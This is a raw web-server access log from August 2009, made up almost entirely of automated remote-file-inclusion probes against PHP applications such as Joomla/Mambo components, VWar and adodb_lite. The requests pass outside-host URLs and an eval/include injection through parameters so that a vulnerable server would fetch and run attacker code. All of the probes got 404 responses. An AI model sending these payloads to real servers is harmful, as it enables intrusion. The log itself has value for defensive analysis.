219.117.207.76 - - [02/Aug/2009:05:53:33 -0400] "GET /logs/access_log.Q109062200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
219.117.207.76 - - [02/Aug/2009:05:53:33 -0400] "GET /logs/access_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.111.62.19 - - [02/Aug/2009:05:54:15 -0400] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
85.119.154.129 - - [02/Aug/2009:05:54:45 -0400] "GET ///lostpasswd.php?env[include_prefix]=http://www.lines.it///id.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
80.73.192.55 - - [02/Aug/2009:05:55:01 -0400] "GET /logs/access_log.Q109070600%20%20//yabbse/Sources/Packages.php?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:05:55:13 -0400] "GET /logs/access_log.Q109071500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
216.120.237.150 - - [02/Aug/2009:05:55:45 -0400] "GET /logs/access_log.Q109070800//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
80.73.192.55 - - [02/Aug/2009:05:55:50 -0400] "GET /logs/access_log.Q109052700//yabbse/Sources/Packages.php?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.6.149.44 - - [02/Aug/2009:05:56:14 -0400] "GET /images/items/EcOm/orthoscrew_thumb.jpg HTTP/1.0" 200 1497 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
122.201.81.6 - - [02/Aug/2009:05:56:56 -0400] "GET /logs/access_log.Q109071500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.128.135.52 - - [02/Aug/2009:05:57:55 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.128.135.52 - - [02/Aug/2009:05:57:55 -0400] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
62.128.135.52 - - [02/Aug/2009:05:57:55 -0400] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
211.189.39.159 - - [02/Aug/2009:06:00:00 -0400] "GET /logs/access_log.Q109051100///include/print_category.php?setup[use_category]=1&dir=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.189.39.159 - - [02/Aug/2009:06:00:00 -0400] "GET ///include/print_category.php?setup[use_category]=1&dir=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.189.39.159 - - [02/Aug/2009:06:00:00 -0400] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
87.118.117.124 - - [02/Aug/2009:06:00:37 -0400] "GET /e404.php?DOCUMENT_ROOT=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
87.118.117.124 - - [02/Aug/2009:06:00:37 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
87.118.117.124 - - [02/Aug/2009:06:00:37 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
87.118.117.124 - - [02/Aug/2009:06:00:38 -0400] "GET /logs/access_log.Q109071200/e404.php?DOCUMENT_ROOT=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:06:00:53 -0400] "GET /logs///vwar/backup/errors.php?error=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:06:00:53 -0400] "GET /logs/access_log.Q109061000%20%20///vwar/backup/errors.php?error=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:06:00:53 -0400] "GET ///vwar/backup/errors.php?error=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:06:01:03 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
87.118.117.124 - - [02/Aug/2009:06:02:33 -0400] "GET /logs/access_log.Q109050800%20%20/e404.php?DOCUMENT_ROOT=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.118.117.124 - - [02/Aug/2009:06:03:05 -0400] "GET /logs/access_log.Q109071200%20%20/e404.php?DOCUMENT_ROOT=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.111.62.19 - - [02/Aug/2009:06:04:56 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.111.62.19 - - [02/Aug/2009:06:04:56 -0400] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
200.111.62.19 - - [02/Aug/2009:06:04:56 -0400] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
216.14.113.10 - - [02/Aug/2009:06:05:46 -0400] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:06:05:51 -0400] "GET /logs/access_log.Q109061700///vwar/backup/errors.php?error=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:06:06:45 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:06:06:45 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:06:06:45 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:06:06:45 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:06:07:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.3 - - [02/Aug/2009:06:07:11 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:06:07:11 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:06:07:11 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:06:07:11 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:07:13 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:07:13 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:07:13 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:07:18 -0400] "GET /logs/access_log.Q109071900%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:08:06 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:08:06 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:08:06 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:08:11 -0400] "GET /logs/access_log.Q109071900%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:08:55 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:08:55 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:09:00 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:09:10 -0400] "GET /logs/access_log.Q109071900//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:09:16 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:09:16 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:09:16 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:09:17 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:09:18 -0400] "GET /logs/access_log.Q109071900//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.50.85.19 - - [02/Aug/2009:06:09:20 -0400] "GET //adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.i-ga.biz/readme.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.50.85.19 - - [02/Aug/2009:06:09:20 -0400] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.i-ga.biz/readme.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.50.85.19 - - [02/Aug/2009:06:09:20 -0400] "GET /logs/access_log.Q109061300//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.i-ga.biz/readme.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.50.85.19 - - [02/Aug/2009:06:09:20 -0400] "GET /logs/access_log.Q109052900//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.i-ga.biz/readme.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:09:31 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:09:31 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:09:31 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:09:32 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:09:32 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:09:34 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:09:34 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:09:34 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:09:36 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.120.227.242 - - [02/Aug/2009:06:09:43 -0400] "GET //administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.biggsontour.de//components/com_simpleboard/idste.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.810"
216.117.172.131 - - [02/Aug/2009:06:09:56 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.195.69.64 - - [02/Aug/2009:06:09:57 -0400] "GET ///vwar/backup/errors.php?error=http://indo.home.ro/testv??? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
213.195.69.64 - - [02/Aug/2009:06:09:57 -0400] "GET /logs///vwar/backup/errors.php?error=http://indo.home.ro/testv??? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
216.117.172.131 - - [02/Aug/2009:06:09:59 -0400] "GET /logs/access_log.Q109061600%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:10:03 -0400] "GET /logs/access_log.Q109061600%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:10:06 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:10:06 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:10:06 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.252.241.20 - - [02/Aug/2009:06:10:07 -0400] "GET //administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.812"
89.252.241.20 - - [02/Aug/2009:06:10:07 -0400] "GET //administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.812"
216.117.172.131 - - [02/Aug/2009:06:10:09 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.111.62.19 - - [02/Aug/2009:06:10:10 -0400] "GET /logs/access_log.Q109070800//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
220.123.239.163 - - [02/Aug/2009:06:10:13 -0400] "GET /logs/access_log.Q109071900//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:06:10:21 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:06:10:44 -0400] "GET /logs/access_log.Q109060100%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:06:10:44 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
74.50.85.19 - - [02/Aug/2009:06:10:47 -0400] "GET /logs/access_log.Q109061300%20%20//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.i-ga.biz/readme.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.50.85.19 - - [02/Aug/2009:06:10:47 -0400] "GET /logs/access_log.Q109052900%20%20//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.i-ga.biz/readme.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:10:48 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:10:48 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:10:48 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:11:00 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.252.241.20 - - [02/Aug/2009:06:11:03 -0400] "GET //administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.812"
216.117.172.131 - - [02/Aug/2009:06:11:03 -0400] "GET /logs/access_log.Q109071900//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.252.241.20 - - [02/Aug/2009:06:11:04 -0400] "GET //administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.812"
220.123.239.163 - - [02/Aug/2009:06:11:04 -0400] "GET /logs/access_log.Q109061600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:11:05 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:11:05 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:11:05 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:11:28 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:11:41 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:11:42 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:11:42 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:11:42 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:11:42 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:11:42 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:11:46 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:11:46 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:11:47 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
